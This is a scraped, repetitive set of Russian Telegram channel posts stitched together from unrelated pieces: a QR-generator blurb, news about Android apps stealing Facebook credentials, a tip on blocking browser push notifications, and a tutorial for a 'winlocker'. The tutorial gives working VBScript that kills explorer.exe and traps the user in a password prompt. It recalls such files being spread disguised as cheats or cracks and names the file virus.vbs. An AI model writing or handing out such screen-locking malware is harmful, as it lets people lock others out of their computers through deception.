и много чего еще. Также можно выбрать и настроить дизайн вашего QR-кода.
Кроме того, многие другие возможности применения не требуют соединения смартфона с Интернетом. Можно шифровать записи календаря о предстоящих мероприятиях, WiFi-соединения или контактные данные в виде виртуальных визиток (vCard), и затем пользователь может сохранять их в свой мобильный телефон.
https://ru.qr-code-generator.com/
25 приложений для Android воровали учетные данные Facebook
Двадцать пять приложений для операционной системы Android, которые можно было загрузить со страниц интернет-магазина Google Play Store, являются вредоносными. К такому выводу пришли специалисты французской компании Evina.
По их данным, пользователи успели загрузить вредоносы не менее 2,34 млн раз. Вирусы содержались в графических редакторах, обоях, шагомерах, играх, файловых менеджерах и других видах приложений. Несмотря на разные функции, все они похищали личные данные из Facebook.
Как пояснили специалисты, вредоносы точно созданы одной и той же группой хакеров, поскольку все программы содержали один и тот же код. Пользователи даже не подозревали, что при загрузке своего аккаунта в социальной сети на самом деле видели наложенную поверх браузера фальшивку, с которой их личные данные уходили в распоряжение третьих лиц.
Кстати, большинство приложений провисели в маркете более года и как их пропустил и оставил гугл остается только догадываться. Мне вообще кажется, что малварь нашли сами пользователи, а уже потом специалисты компании Evina😳
P.S список зараженных малварью приложений и пример фиш страницы на фото👇
Двадцать пять приложений для операционной системы Android, которые можно было загрузить со страниц интернет-магазина Google Play Store, являются вредоносными. К такому выводу пришли специалисты французской компании Evina.
По их данным, пользователи успели загрузить вредоносы не менее 2,34 млн раз. Вирусы содержались в графических редакторах, обоях, шагомерах, играх, файловых менеджерах и других видах приложений. Несмотря на разные функции, все они похищали личные данные из Facebook.
Как пояснили специалисты, вредоносы точно созданы одной и той же группой хакеров, поскольку все программы содержали один и тот же код. Пользователи даже не подозревали, что при загрузке своего аккаунта в социальной сети на самом деле видели наложенную поверх браузера фальшивку, с которой их личные данные уходили в распоряжение третьих лиц.
Кстати, большинство приложений провисели в маркете более года и как их пропустил и оставил гугл остается только догадываться. Мне вообще кажется, что малварь нашли сами пользователи, а уже потом специалисты компании Evina😳
P.S список зараженных малварью приложений и пример фиш страницы на фото👇
This media is not supported in your browser
VIEW IN TELEGRAM
Отключаем вредоносные push-уведомления
Привет, читатель Cmd!
Думаю тебя, как и меня раздражают постоянно всплывающие окошки на сайтах, в которых предлагается разрешить показ уведомлений сайта.
В некоторых случаях под таким средством оповещения скрывается малварь. И тут неважно, разрешите ли вы отправку уведомлений или заблокируете. Если вы нажмете по всплывающему окну, то рискуете подхватить малварь
или сами того не понимая, дадите доступ к микрофону, местоположению и тд. Под назойливым оповещением может скрываться все, что угодно. Поэтому рекомендую отключить данную функцию.
В яндекс браузере
Зайдите в настройки > промотайте вниз до строки "сайты" > выберите пункт "Не показывать запрос на отправку"
В google chrome
Зайдите в настройки > перейдите в раздел "Конфиденциальность и безопасность" > выберете пункт "настройки сайта" > "Всплывающие окна и переадресация" и отключите функцию.
P.S Google сейчас борется с всплывающими окнами. Если у вас последняя версия браузера, функция отключения по умолчанию.
Привет, читатель Cmd!
Думаю тебя, как и меня раздражают постоянно всплывающие окошки на сайтах, в которых предлагается разрешить показ уведомлений сайта.
В некоторых случаях под таким средством оповещения скрывается малварь. И тут неважно, разрешите ли вы отправку уведомлений или заблокируете. Если вы нажмете по всплывающему окну, то рискуете подхватить малварь
или сами того не понимая, дадите доступ к микрофону, местоположению и тд. Под назойливым оповещением может скрываться все, что угодно. Поэтому рекомендую отключить данную функцию.
В яндекс браузере
Зайдите в настройки > промотайте вниз до строки "сайты" > выберите пункт "Не показывать запрос на отправку"
В google chrome
Зайдите в настройки > перейдите в раздел "Конфиденциальность и безопасность" > выберете пункт "настройки сайта" > "Всплывающие окна и переадресация" и отключите функцию.
P.S Google сейчас борется с всплывающими окнами. Если у вас последняя версия браузера, функция отключения по умолчанию.
Блокируем компьютер. Создаем собственный винлокер.
Давайте перенесемся на лет 5-6 назад и вспомним эру винлокеров.
На каждом форуме, сайте, треде, везде где можно прикрепить файл, люди скидывали винлок под видом читов или кряков.
Чем был вызван такой тренд не понятно, но было весело. Никто не хотел особо вредить. Мы тоже не будем.
Создадим за пару минут что-то типо винлокера, который будет блокировать рабочий стол и требовать ввести пароль.
Если мы предположим, что человек, который откроет наш винлок имеет пользовательский уровень владения пк и снимет наш винлок через диспетчер задач, то он молодец.
Вот только рабочий стол к нему не вернется и тут поможет только перезагрузка пк.
Открываем блокнот и вставляем туда код:
on error resume next
set t=createobject("Wscript.Shell")
set kill = createobject("wscript.shell")
kill.run"taskkill /f /im explorer.exe",0
do
password = InputBox ("Windows заблокирован редактором Cmd, капитулируйте")
Loop Until password = "12"
t.run"explorer"
Теперь сохраняем с расширением vbs (virus.vbs). На этом винлок готов. Пароль меняется в строке
Давайте перенесемся на лет 5-6 назад и вспомним эру винлокеров.
На каждом форуме, сайте, треде, везде где можно прикрепить файл, люди скидывали винлок под видом читов или кряков.
Чем был вызван такой тренд не понятно, но было весело. Никто не хотел особо вредить. Мы тоже не будем.
Создадим за пару минут что-то типо винлокера, который будет блокировать рабочий стол и требовать ввести пароль.
Если мы предположим, что человек, который откроет наш винлок имеет пользовательский уровень владения пк и снимет наш винлок через диспетчер задач, то он молодец.
Вот только рабочий стол к нему не вернется и тут поможет только перезагрузка пк.
Открываем блокнот и вставляем туда код:
on error resume next
set t=createobject("Wscript.Shell")
set kill = createobject("wscript.shell")
kill.run"taskkill /f /im explorer.exe",0
do
password = InputBox ("Windows заблокирован редактором Cmd, капитулируйте")
Loop Until password = "12"
t.run"explorer"
Теперь сохраняем с расширением vbs (virus.vbs). На этом винлок готов. Пароль меняется в строке
Loop Until password = "12"
Чтобы вернуть рабочий стол заходим в диспетчер задач > новая задача > пишем explorer.exe